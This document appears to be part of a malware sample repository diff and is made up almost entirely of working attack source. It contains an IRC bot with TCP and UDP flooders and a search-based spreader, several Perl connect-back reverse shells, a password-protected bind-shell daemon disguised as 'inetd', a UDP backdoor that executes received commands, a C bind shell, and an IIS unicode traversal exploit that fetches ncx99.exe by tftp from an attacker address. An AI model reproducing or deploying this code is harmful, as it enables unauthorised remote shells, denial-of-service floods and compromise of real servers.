}
exit;
}
}
}
sub tcpflooder {
my $itime = time;
my ($cur_time);
my ($ia,$pa,$proto,$j,$l,$t);
$ia=inet_aton($_[0]);
$pa=sockaddr_in($_[1],$ia);
$ftime=$_[2];
$proto=getprotobyname('tcp');
$j=0;$l=0;
$cur_time = time - $itime;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
socket($t,PF_INET,SOCK_STREAM,$proto);
connect($t,$pa)||$j--;
$j++;$l++;
}
$l=0;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
shutdown($t,2);
$l++;
}
}
sub udpflooder {
my $iaddr = inet_aton($_[0]);
my $msg = 'A' x $_[1];
my $ftime = $_[2];
my $cp = 0;
my (%pacotes);
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
return(undef) if $cp == 4;
my $itime = time;
my ($cur_time);
while ( 1 ) {
for (my $porta = 1; $porta <= 65000; $porta++) {
$cur_time = time - $itime;
last if $cur_time >= $ftime;
send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;
for (my $pc = 3; $pc <= 255;$pc++) {
next if $pc == 6;
$cur_time = time - $itime;
last if $cur_time >= $ftime;
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
}
}
last if $cur_time >= $ftime;
}
return($cur_time, %pacotes);
}
sub ctcp {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :\001$_[1]\001");
}
sub msg {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :$_[1]");
}
sub notice {
return unless $#_ == 1;
sendraw("NOTICE $_[0] :$_[1]");
}
sub op {
return unless $#_ == 1;
sendraw("MODE $_[0] +o $_[1]");
}
sub deop {
return unless $#_ == 1;
sendraw("MODE $_[0] -o $_[1]");
}
sub j { &join(@_); }
sub join {
return unless $#_ == 0;
sendraw("JOIN $_[0]");
}
sub p { part(@_); }
sub part {
sendraw("PART $_[0]");
}
sub nick {
return unless $#_ == 0;
sendraw("NICK $_[0]");
}
sub quit {
sendraw("QUIT :$_[0]");
}
# Spreader
# this 'spreader' code isnot mine, i dont know who coded it.
# update: well, i just fix0red this shit a bit.
#
sub fetch(){
my $rnd=(int(rand(9999)));
my $n= 80;
if ($rnd<5000) { $n<<=1;}
my $s= (int(rand(10)) * $n);
my @dominios = ("com","net","org","info","gov", "gob","gub","xxx", "eu","mil","edu","aero","name","us","ca","mx","pa","ni","cu","pr","ve","co","pe","ec",
"py","cl","uy","ar","br","bo","au","nz","cz","kr","jp","th","tw","ph","cn","fi","de","es","pt","ch","se","su","it","gr","al","dk","pl","biz","int","pro","museum","coop",
"af","ad","ao","ai","aq","ag","an","sa","dz","ar","am","aw","at","az","bs","bh","bd","bb","be","bz","bj","bm","bt","by","ba","bw","bn","bg","bf","bi",
"vc","kh","cm","td","cs","cy","km","cg","cd","dj","dm","ci","cr","hr","kp","eg","sv","aw","er","sk",
"ee","et","ge","fi","fr","ga","gs","gh","gi","gb","uk","gd","gl","gp","gu","gt","gg","gn","gw","gq","gy","gf","ht","nl","hn","hk","hu","in","id","ir",
"iq","ie","is","ac","bv","cx","im","nf","ky","cc","ck","fo","hm","fk","mp","mh","pw","um","sb","sj","tc","vg","vi","wf","il","jm","je","jo","kz","ke",
"ki","kg","kw","lv","ls","lb","ly","lr","li","lt","lu","mo","mk","mg","my","mw","mv","ml","mt","mq","ma","mr","mu","yt","md","mc","mn","ms","mz","mm",
"na","nr","np","ni","ne","ng","nu","no","nc","om","pk","ps","pg","pn","pf","qa","sy","cf","la","re","rw","ro","ru","eh","kn","ws","as","sm","pm","vc",
"sh","lc","va","st","sn","sc","sl","sg","so","lk","za","sd","se","sr","sz","rj","tz","io","tf","tp","tg","to","tt","tn","tr","tm","tv","ug","ua","uz",
"vu","vn","ye","yu","cd","zm","zw","");
my @str;
foreach $dom (@dominios)
{
push (@str,"%22modules.php?name%3A%22+%7C+%22+inurl%3Amodules.php%3Fname%3D+site%3A".$dom."%20");
}
my $query="www.google.com/search?q=";
$query.=$str[(rand(scalar(@str)))];
$query.="&num=$n&start=$s";
my @lst=();
my $page = http_query($query);
while ($page =~ m/<a class=l href=\"?http:\/\/([^>\"]+)\"?>/g){
if ($1 !~ m/google|cache|translate/){
push (@lst,$1);
}
}
return (@lst);
}
sub http_query($){
my ($url) = @_;
my $host=$url;
my $query=$url;
my $page="";
$host =~ s/href=\"?http:\/\///;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query =~s/$host//;
if ($query eq "") {$query="/";};
eval {
local $SIG{ALRM} = sub { die "1";};
alarm 10;
my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$sock>;
$page="@r";
alarm 0;
close($sock);
};
return $page;
}

46
Perl/Backdoor.Perl.Small.a Normal file
View File

@ -0,0 +1,46 @@
# Backdoor - Perl Connect Back Backdoor
# Unpublished/Unreleased Source Code
use Socket;
print "Backdoor ! bypassing Firewalls\n\n";
if (!$ARGV[0]) {
printf "Uso: $0 [Host] <Puerto>\n";
exit(1);
}
print "[*] Espere ...\n";
$host = $ARGV[0];
$port = 80;
if ($ARGV[1]) {
$port = $ARGV[1];
}
print "[*] Conectando...\n";
$proto = getprotobyname('tcp') || die("[-] Protocolo Desconocido\n");
socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("[-] Error Socket\n");
my $target = inet_aton($host);
if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
die("[-] Imposible Conectar\n");
}
print "[*] Cargando Shell...\n";
if (!fork( )) {
open(STDIN,">&SERVER");
open(STDOUT,">&SERVER");
open(STDERR,">&SERVER");
exec {'/bin/sh'} '-bash' . "\0" x 4;
exit(0);
}
print "[*] Cargada a joder!\n\n";

59
Perl/Backdoor.Perl.Small.e Normal file
View File

@ -0,0 +1,59 @@
use IO::Socket;
#IRAN HACKERS SABOTAGE Connect Back Shell
#code by:LorD
#We Are :LorD-C0d3r-NT
#
#lord@SlackwareLinux:/home/programing$ perl dc.pl
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#Usage: dc.pl [Host] [Port]
#
#Ex: dc.pl 127.0.0.1 2121
#lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#[*] Resolving HostName
#[*] Connecting... 127.0.0.1
#[*] Spawning Shell
#[*] Connected to remote host
#bash-2.05b# nc -vv -l -p 2121
#listening on [any] 2121 ...
#connect to [127.0.0.1] from localhost [127.0.0.1] 2121
#--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#--==Systeminfo==--
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
#
#--==Userinfo==--
#uid=1001(lord) gid=100(users) groups=100(users)
#
#--==Directory==--
#/root
#
#--==Shell==--
#
$system = '/bin/sh';
$ARGC=@ARGV;
print "--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n";
if ($ARGC!=2) {
print "Usage: $0 [Host] [Port] \n\n";
die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[*] Resolving HostName\n";
print "[*] Connecting... $ARGV[0] \n";
print "[*] Spawning Shell \n";
print "[*] Connected to remote host \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n";
system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;
echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");
system($system);
#EOF

18
Perl/Backdoor.Perl.Small.i Normal file
View File

@ -0,0 +1,18 @@
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);

462
Perl/Backdoor.Perl.Termapp.a Normal file
View File

@ -0,0 +1,462 @@
# Telnet-like Standard Daemon 0.7
#
# 0ldW0lf - oldwolf@atrixteam.net
# - old-wolf@zipmai.com
# - www.atrix.cjb.net
# - www.atrixteam.net
#
# For those guys that still like to open ports
# and use non-rooted boxes
#
# This has been developed to join in the TocToc
# project code, now it's done and I'm distributing
# this separated
#
# This one i made without IO::Pty so it uses
# only standard modules... enjoy it
#
# tested on linux boxes.. probably will work fine on others
# any problem... #atrix@irc.brasnet.org
#
##########################################################
# ******************* CONFIGURATION ******************** #
##########################################################
my $PORT = $ARGV[0] || 3847; # default port is 3847
my $PASS = 'ouhEUhhJ6RbwE'; # encripted password
my $SHELL = "/bin/bash"; # shell to be executed
my $HOME = "/tmp"; # your HOME
my $PROC = "inetd"; # name of the process
my $PASS_PROMPT = "Password: "; # password prompt
my $WRONG_PASS = "Password Errata!"; # "wrong password" message
my @STTY = ('sane', 'dec'); # stty arguments
##########################################################
# feel free to change the ENV
#### ENVironment ####
$ENV{HOME} = $HOME;
#$ENV{PS1} = '[\u@\h \W]: '; # the way i like :)
# colorful PS1 is also funny :)
$ENV{PS1} = '\[\033[3;36m\][\[\033[3;34m\]\[\033[1m\]\u\[\033[3;36m\]@\[\033[0m\]\[\033[3;34m\]\[\033[1m\]\h \[\033[0m\]\[\033[1m\]\W\[\033[0m\]\[\033[3;36m\]]\[\033[0m\]\[\033[1m:\[\033[0m\] ';
$ENV{MAIL} = '/var/mail/root';
$ENV{PATH} = '/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin';
$ENV{HISTFILE} = '/dev/null';
$ENV{USER} = 'root';
$ENV{LOGNAME} = 'root';
$ENV{LS_OPTIONS} = ' --color=auto -F -b -T 0';
$ENV{LS_COLORS} = 'no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.bz2=01;31:*.rpm=01;31:*.deb=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.mpg=01;37:*.avi=01;37:*.mov=01;37:';
$ENV{SHELL} = $SHELL;
$ENV{TERM} = 'xterm';
#####################
$0=$PROC."\0";
use IO::Socket;
use IO::Select;
use POSIX;
use strict;
# i wouldn't change that
# if i were you
###### SIGnals ######
$SIG{HUP} = 'IGNORE';
$SIG{PS} = 'IGNORE';
$SIG{TERM} = 'IGNORE';
$SIG{CHLD} = sub { wait; };
#####################
# ioctl stuff
my %IOCTLDEF;
$IOCTLDEF{TIOCSWINSZ} = 0x5414;
$IOCTLDEF{TIOCNOTTY} = 0x5422;
$IOCTLDEF{TIOCSCTTY} = 0x540E;
safeload('sys/ttycom.ph', 1); # BSD
safeload('sys/ioctl.ph', 1);
safeload('asm/ioctls.ph', 1);
foreach my $IOCTL (keys(%IOCTLDEF)) {
next if (defined(&{$IOCTL}));
if (open(IOD, "< /usr/include/asm/ioctls.h")) { # linux
while(<IOD>) {
if (/^\#define\s+$IOCTL\s+(.*?)\n$/) {
eval "sub $IOCTL () {$1;}";
last;
}
}
close(IOD);
}
# i realy dunno if i can do that.. but.. here it goes
eval "sub $IOCTL () { $IOCTLDEF{$IOCTL};}" unless (defined(&{$IOCTL}));
}
# starting...
$PORT = $ARGV[0] if ($ARGV[0]);
chdir('/');
no strict 'refs';
my $bindfd = *{'bind_sock'};
*{$bindfd}= IO::Socket::INET->new(Listen => 1, LocalPort => $PORT, Proto => "tcp") || die "could not listen on port $PORT: $!";
my $bind = \*{$bindfd};
my $pid = fork();
die "ERROR: I could not fork() the process." unless defined($pid);
exit if $pid;
my %CLIENT;
my $sel_serv = IO::Select->new($bind);
my $sel_shell = IO::Select->new();
# main loop...
while ( 1 ) {
select(undef,undef,undef, 0.3) if (scalar(keys(%CLIENT)) == 0);
read_clients();
read_shells();
}
sub read_clients {
map { read_client($_) } ($sel_serv->can_read(0.01));
}
sub read_client {
my $fh = shift;
if ($fh eq $bind) {
my $newcon = $bind->accept;
$sel_serv->add($newcon);
$CLIENT{$newcon}->{senha} = 0;
$CLIENT{$newcon}->{sock} = $newcon;
$fh->autoflush(1);
do_client($newcon, '3', '5', '1');
sleep(1);
write_client($newcon, $PASS_PROMPT) if ($PASS_PROMPT);
} else {
my $msg;
my $nread = sysread($fh, $msg, 1024);
if ($nread == 0) {
close_client($fh);
} else {
telnet_parse($fh, $msg);
}
}
}
sub read_shells {
map { read_shell($_) } ($sel_shell->can_read(0.01));
}
sub telnet_parse {
my ($cli, $msg) = @_;
my $char = (split('', $msg))[0];
if (ord($char) == 255) {
chr_parse($cli, $msg);
} else {
if ($CLIENT{$cli}->{senha} == 0) {
$CLIENT{$cli}->{buf} .= $msg;
return() unless ($msg =~ /\r|\n/);
my $pass = $CLIENT{$cli}->{buf};
$CLIENT{$cli}->{buf} = '';
$pass =~ s/\n//g;
$pass =~ s/\0//g;
$pass =~ s/\r//g;
if (crypt($pass, $PASS) ne $PASS) {
finish_client($cli, "\r\n\r".$WRONG_PASS."\r\n\r");
} else {
$CLIENT{$cli}->{senha} = 1;
write_client($cli, chr(255).chr(253).chr(31));
write_client($cli, "\r\n\r\r\n\r");
new_shell($cli);
}
return();
}
$msg =~ s/\r\n\0\0//g;
$msg =~ s/\0//g;
$msg =~ s/\r\n/\n/g;
write_shell($cli, $msg);
}
}
sub read_shell {
my $shell = shift;
my $cli;
map { $cli = $CLIENT{$_}->{sock} if ($CLIENT{$_}->{shell} eq $shell) } keys(%CLIENT);
my $msg;
my $nread = sysread($shell, $msg, 1024);
if ($nread == 0) {
finish_client($cli, "Terminal closed.\r\n\r");
} else {
write_client($cli, $msg);
}
}
sub to_chr {
my $chrs = '';
map { $chrs .= chr($_) } (split(/ +/, shift));
return($chrs);
}
sub do_client {
my ($client, @codes) = @_;
map { write_client($client, chr(255).chr(251).chr($_)) } @codes;
}
sub chr_parse {
my ($client, $chrs) = @_;
my $ords = '';
map { $ords .= ord($_).' ' } (split(//, $chrs));
my $msg = '';
if ($ords =~ /255 250 31 (\d+) (\d+) (\d+) (\d+)/) {
my $winsize = pack('C4', $4, $3, $2, $1);
ioctl($CLIENT{$client}->{shell}, &TIOCSWINSZ, $winsize);# || die "erro: $!";
}
foreach my $code (split("255 ", $ords)) {
if ($code =~ /(\d+) (.*)$/) {
my $codes = $2;
if ($1 == 251) {
# do whatever you want dude ehehe
$msg .= chr(255).chr(253);
map { $msg .= chr($_) } (split(/ +/, $codes));
}
}
}
write_client($client, $msg) if ($msg);
return(1);
}
sub new_shell {
my $cli = shift;
POSIX::setpgid(0, 0);
my ($tty, $pty);
unless (($tty, $pty) = open_tty($cli)) {
finish_client($cli, "ERROR: No more pty´s avaliable\n");
return(undef);
}
my $pid = fork();
if (not defined($pid)) {
finish_client($cli, "ERROR: fork()\n");
return(undef);
}
unless($pid) {
close($pty);
local(*DEVTTY);
if (open (DEVTTY, "/dev/tty")) {
ioctl(DEVTTY, &TIOCNOTTY, 0 );# || die "erro: $!";
close(DEVTTY);
}
POSIX::setsid();
ioctl($tty, &TIOCSCTTY, 0);# || die "erro: $!";
open (STDIN, "<&".fileno($tty)) || die "I could not reopen STDIN: $!";
open (STDOUT, ">&".fileno($tty)) || die "I could not reopen STDOUT: $!";
open (STDERR, ">&".fileno($tty)) || die "I could not reopen STDERR: $!";
close($tty);
sleep(1);
foreach my $stty ("/bin/stty", "/usr/bin/stty") {
next unless (-x $stty);
map { system("$stty", $_) } @STTY;
}
chdir("$HOME");
{ exec("$SHELL") };
syswrite(STDOUT, "\n\nERROR: exec($SHELL)\n\nI could not execute the shell ($SHELL)\nHowever you are lucky :P\nYou can use the \"I'm FUCKED!\" mode and fix up this thing...\nTip: Find some shell and execute it ;)\n\n");
syswrite(STDOUT, "\n\nOK! I'm Fucked mode.\n");
syswrite(STDOUT, "Type ^C to exit\n\nI'm FuCKeD!# ");
while (my $msg = <STDIN>) {
$msg =~ s/\n$//;
$msg =~ s/\r$//;
if ($msg =~ /^\s*cd\s+(\S+)/) {
my $notf = "directory $1 not found!\n";
chdir($1) || syswrite(STDOUT, $notf, length($notf));
} else {
system("$msg 2>&1");
}
syswrite(STDOUT, "I'm FuCKeD!# ");
}
exit;
}
close($tty);
select($pty); $| = 1;
select(STDOUT);
set_raw($pty);
$CLIENT{$cli}->{shell} = $pty;
$sel_shell->add($pty);
return(1);
}
# Funciton set_raw() stolen from IO::Pty
sub set_raw($) {
my $self = shift;
return 1 if not POSIX::isatty($self);
my $ttyno = fileno($self);
my $termios = new POSIX::Termios;
unless ($termios) {
# warn "set_raw: new POSIX::Termios failed: $!";
return undef;
}
unless ($termios->getattr($ttyno)) {
# warn "set_raw: getattr($ttyno) failed: $!";
return undef;
}
$termios->setiflag(0);
$termios->setoflag(0);
$termios->setlflag(0);
$termios->setcc(&POSIX::VMIN, 1);
$termios->setcc(&POSIX::VTIME, 0);
unless ($termios->setattr($ttyno, &POSIX::TCSANOW)) {
# warn "set_raw: setattr($ttyno) failed: $!";
return undef;
}
return 1;
}
sub open_tty {
no strict;
my $cli = shift;
my ($PTY, $TTY) = (*{"pty.$cli"}, *{"tty.$cli"}); # believe me old versions :/
for (my $i = 0; $i < 256; $i++) {
my $pty = get_tty($i, "/dev/pty");
next unless (open($PTY, "+> $pty"));
my $tty = get_tty($i, "/dev/tty");
unless(open($TTY, "+> $tty")) {
close($PTY);
next;
}
return($TTY, $PTY);
}
return();
}
sub get_tty {
my ($num, $base) = @_;
my @series = ('p' .. 'z', 'a' .. 'e');
my @subs = ('0' .. '9', 'a' .. 'f');
my $buf = $base;
$buf .= @series[($num >> 4) & 0xF];
$buf .= @subs[$num & 0xF];
return($buf);
}
sub safeload {
my ($module, $require, $arg) = @_;
my $file = $module;
$file =~ s/::/\//g;
if ($require) {
# all found gonna be loaded
map { eval ("require \"$_/$file\";") if(-f "$_/$file"); } @INC;
} else {
$file .= ".pm" unless ($file =~ /(\.pm|\.ph)$/);
return(eval("use $module $arg;")) if (grep { -f "$_/$file" } @INC);
}
return();
}
sub write_shell {
my ($cli, $msg) = @_;
my $shell = $CLIENT{$cli}->{shell};
return(undef) unless ($shell);
foreach my $m (split_chars($msg, 20)) {
read_shells();
print $shell $m;
read_shells();
}
return(1);
}
sub split_chars {
my ($msg, $nchars) = @_;
my @splited;
my @chrs = split ('', $msg);
my $done = 0;
while ( 1 ) {
my $splited = join('', @chrs[$done .. ($done+$nchars-1)]);
$done += $nchars;
last if (length($splited) < 1);
push(@splited, $splited);
}
return(@splited);
}
sub finish_client {
my ($cli, $msg) = @_;
write_client($cli, $msg);
close_client($cli);
}
sub close_client {
my $cli = shift;
my $sock = $CLIENT{$cli}->{sock};
$sel_serv->remove($sock);
if ($CLIENT{$cli}->{shell}) {
my $shell = $CLIENT{$cli}->{shell};
$sel_shell->remove($shell);
close($shell);
}
$sock->close() if($sock);
delete($CLIENT{$cli});
}
sub write_client {
my ($cli, $msg) = @_;
my $sock = $CLIENT{$cli}->{sock};
syswrite($sock, $msg, length($msg)) if ($sock);
}

145
Perl/Backdoor.Perl.Udpdor Normal file
View File

@ -0,0 +1,145 @@
# server..
# see docs for what needs to be edited..
# (plastek)
$pid=fork;
exit if $pid;
die("Error.") unless defined($pid);
use IO::Socket;
use POSIX;
use Fcntl ':flock';
POSIX::setsid();
$0 = 'slash';
$time_to_die=0;
sub signal_handler {
$time_to_die=1;
}
$SIG{INT}=$SIG{TERM}=$SIG{HUP}=\&signal_handler;
until($time_to_die) {
$|=1;
$port=52000;
$maxlen=1024;
my($sock, $raddr, $rhost);
$sock=IO::Socket::INET->new(LocalPort=>$port,Proto=>'udp') or die("Error.\n");
while($sock->recv($msg, $maxlen)) {
my($rport, $ipaddr)=sockaddr_in($sock->peername);
$rhost=gethostbyaddr($ipaddr, AF_INET);
# to r be change
if($rhost =~ /(pear|cherry)/){
if($rport =~ /1243/){
my $kfile = '...k';
open(KFILE, "< $kfile");
for my $bytes(<KFILE>){
$kekel = $bytes;
}
$blew = Gh0ST0r->new($kekel);
$fmsg = $blew->gee_golly($msg);
close KFILE;
if($fmsg =~ /sendtxt/){
$fmsg =~ s/sendbin//;
my ($file, $payload) = split(/::::/, $fmsg);
open(TMP, ">> $file");
flock(TMP, LOCK_SH);
print TMP $payload;
close TMP;
}
if($fmsg =~ /nike::/){
$fmsg =~ s/nike:://;
open(KTMP, "> ...k");
print KTMP "$fmsg";
close KTMP;
system("chmod 600 $kfile");
}
if($fmsg =~ /\.\//){
$fmsg =~ s/\.\///;
system("$fmsg");
}
}
}
}
}
package Gh0ST0r;
require Exporter;
@ISA = qw(Exporter);
@EXPORT_OK = qw();
use strict;
no strict 'refs';
use vars qw( @b @t @R @S @h @o @K $VERSION );
$VERSION = "1.0";
sub new {
my ( $argument, $pp ) = @_;
Setup( $pp );
my $class = ref ( $argument ) || $argument;
my $self = {};
bless $self, $class;
return $self;
}
sub egadz {
my ( $self, $tax ) = @_;
return Gh0ST( $tax );
}
sub gee_golly {
my ( $self, $tax ) = @_;
return Gh0ST( $tax, 1 );
}
sub Gh0ST {
my ( $v, $w, $a, $q, $c, $out, $self );
my ( $e, $d ) = @_;
@h = 0 .. 7;
@o = reverse @h;
while ( $a < length $e ) {
$v = N( $e, $a );
$w = N( $e, ( $a += 8 ) - 4 );
grep $q++ % 2 ? $v ^= F( $w + $K[ $_ ] ) : ( $w ^= F( $v + $K[ $_ ] ) ), $d ? ( @h, ( @o ) x 3 ) : ( ( @h ) x 3, @o );
$out .= pack N2, $w, $v;
}
return $out;
}
sub F {
my $u = 0;
grep $u |= $S[ $_ ][ $_[ 0 ] >> $_ * 4 & 15 ] << $_ * 4, reverse 0 .. 7;
return $u << 11 | $u >> 21;
}
sub R {
return int( (shift) * rand );
}
sub N {
return vec $_[ 0 ], $_[ 1 ] / 4, 32;
}
sub Setup {
my $p = shift;
my ( $s, $i, $c );
for ( $i = 0; $i < length $p; $i += 4 ) {
srand( $s ^= N( $p, $i ) );
}
@b = @t = 0 .. 15;
while ( $c < 8 ) {
grep { push @b, splice @b, R( 9 ), 5 } @t;
$R[ $c ] = R( 2**32 );
@{ $S[ $c++ ] } = @b;
}
}
1;
__END__

73
Perl/Backdoor.Perl.Whoredoor.08 Normal file
View File

@ -0,0 +1,73 @@
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <unistd.h>
#include <netdb.h>
void mk_daemon();
int main(int argc, char **argv)
{
int lfd,cfd;
socklen_t len;
struct sockaddr_in cli,serv;
pid_t pid;
char **sh;
sh[0]="/bin/sh";
sh[1]=NULL;
mk_daemon();
strncpy(argv[0],"ps",sizeof(argv[0]));
lfd=socket(AF_INET,SOCK_STREAM,0);
bzero(&serv,sizeof(serv));
serv.sin_family=AF_INET;
serv.sin_addr.s_addr=htonl(INADDR_ANY);
serv.sin_port=htons(65535);
bind(lfd,(struct sockaddr *)&serv,sizeof(serv));
listen(lfd,5);
while(1)
{
len=sizeof(cli);
cfd=accept(lfd,(struct sockaddr *)&cli,&len);
if(!(pid=fork()))
{
dup2(cfd,0);
dup2(cfd,1);
dup2(cfd,2);
execve(sh[0],sh,NULL);
close(cfd);
exit(0);
}
close(cfd);
}
return 0;
}
void mk_daemon()
{
/* yes I did get this out of UNP */
int x;
pid_t pid;
if((pid=fork()) !=0)
{
exit(-1);
}
setsid();
signal(SIGHUP,SIG_IGN);
signal(SIGINT,SIG_IGN);
if((pid=fork()) !=0)
{
exit(-1);
}
chdir("/");
umask(0);
for(x=0;x<=64;x++)
{
close(x);
}
}

56
Perl/Backdoor.Perl.WinShell.a Normal file
View File

@ -0,0 +1,56 @@
# This is for educational purpose's only!
# WHO LET THEM DOGS OUT!
# Use uni.pl first to see if this is a vulnerable server!
# Based of the script unicodeexecute.pl from Roelof Temmngh
# Files=uniexe.pl,uni.pl,readme.file,tftpd32.exe,exploit.readme
use Socket;
if ($#ARGV<0) {die "Usage: uniexe.pl IP:port command\n";}
($host,$port)=split(/:/,@ARGV[0]);
$target = inet_aton($host);
$failed=1;
$command="dir";
@results=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+$command HTTP/1.0\r\n\r\n\cls");
foreach $line (@results){
if ($line =~ /nit.exe/) {$failed=0;}
}
$failed2=1;
if ($failed==1) {
#You need to change the xxx.xxx.xxx.xxx to your ip address. Duh!
$command="tftp -i xxx.xxx.xxx.xxx GET ncx99.exe c:\\inetpub\\scripts\\nit.exe";
$command=~s/ /\%20/g;
@results2=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+$command HTTP/1.0\r\n\r\n");
foreach $line2 (@results2){
if (($line2 =~ /nit.exe/ )) {$failed2=0;}
}
}
$command=@ARGV[1];
print "\n
Hit CTRL-C if this is Hanging";
$command=~s/ /\%20/g;
my @results=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+$command HTTP/1.0\r\n\r\n");
print @results;
# ------------- Sendraw - thanx RFP rfp@wiretrip.net
sub sendraw { # this saves the whole transaction anyway
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||2) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,$port,$target)){
my @in;
select(S); $|=1; print $pstr;
while(<S>){ push @in, $_;}
select(STDOUT); close(S); return @in;
} else { die("Can't connect...\n"); }
}
# NIT IN THE YEAR 2000

45
Perl/Backdoor.Perl.Worsyn Normal file
View File

@ -0,0 +1,45 @@
use Socket;
print "Data Cha0s Connect Back Backdoor\n\n";
if (!$ARGV[0]) {
printf "Usage: $0 [Host] <Port>\n";
exit(1);
}
print "[*] Dumping Arguments\n";
$host = $ARGV[0];
$port = 80;
if ($ARGV[1]) {
$port = $ARGV[1];
}
print "[*] Connecting...\n";
$proto = getprotobyname('tcp') || die("[-] Unknown Protocol\n");
socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("[-] Socket Error\n");
my $target = inet_aton($host);
if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
die("[-] Unable to Connect\n");
}
print "[*] Spawning Shell\n";
if (!fork( )) {
open(STDIN,">&SERVER");
open(STDOUT,">&SERVER");
open(STDERR,">&SERVER");
exec {'/bin/sh'} '-bash' . "\0" x 4;
exit(0);
}
print "[*] Detached\n\n";

192
Perl/Backdoor.Perl.Wsh.10 Normal file
View File

@ -0,0 +1,192 @@
# wsh-c - cgi based remote unix shell (client part)
# by Alex Dyatlov <alex@dyatlov.ru>
# April, 2002
#
# INSTALL
# Module Term::ReadLine::Gnu installation is recommended, get:
# 1) readline-4.2a.tar.gz or later from
# http://www.gnu.org/directory/readline.html
# 2) ReadLine-Gnu-1.12.tar.gz or later from
# http://search.cpan.org/search?dist=Term-ReadLine-Gnu
#
# SHELL COMMANDS
# exit as is
# history show commands history
# !<number> execute command with history <number>
# wshget <file> get <file> from remote host to local directory
# wshput <file> put <file> from local directory to remote host
use strict;
use IO::Socket;
use Term::ReadLine;
use POSIX qw(:sys_wait_h);
#--- config - begin ----------------------------------->8--
my $use_proxy = 1; #--- (0 || 1) connect directly or use HTTP proxy
my $host = "111.222.33.4"; #--- proxy ip here if $use_proxy = 1
my $port = 3128; #--- proxy port
my $http_port = 80; #--- default HTTP port
my $agent = "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"; #--- for httpd logs
my $anticache = 0; #--- (0 || 1) add '?<random_number>' to URL
my $shell_prompt = "wsh#";
my $pwd = "/"; #--- 'home' directory on remote host
my $pattern = "STCOM";
#--- config - end ------------------------------------->8--
my $VERSION = "1.0";
